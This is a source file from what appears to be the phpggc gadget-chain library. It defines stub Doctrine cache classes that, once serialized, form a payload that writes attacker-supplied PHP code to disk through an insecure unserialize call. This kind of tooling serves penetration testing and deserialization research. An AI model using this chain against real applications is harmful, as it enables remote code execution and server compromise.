Codebase list phpggc / 0a0732bb-898c-41f1-b464-b9ba025c444d/main gadgetchains / Doctrine / FW / 2 / gadgets.php
0a0732bb-898c-41f1-b464-b9ba025c444d/main

Tree @0a0732bb-898c-41f1-b464-b9ba025c444d/main (Download .tar.gz)

gadgets.php @0a0732bb-898c-41f1-b464-b9ba025c444d/mainraw · history · blame

<?php

namespace Doctrine\Common\Cache\Psr6
{
	class CacheAdapter
    {
		private $deferredItems = [];

		public function __construct($CacheItem, $FilesystemCache)
        {
			$this->deferredItems = ['x' => $CacheItem];
			$this->cache = $FilesystemCache;
		}
	}
	class CacheItem
    {
		private $value;

		public function __construct($phpCode)
        {
			$this->value = $phpCode;
		}
	}
}

namespace Doctrine\Common\Cache
{
	class FileCache
    {
		private $extension;
		protected $directory;
		private $umask = 0002;

		public function __construct($extension, $directory)
        {
			$this->extension = $extension;
			$this->directory = $directory;
		}
	}
	
	class FilesystemCache extends FileCache {}
}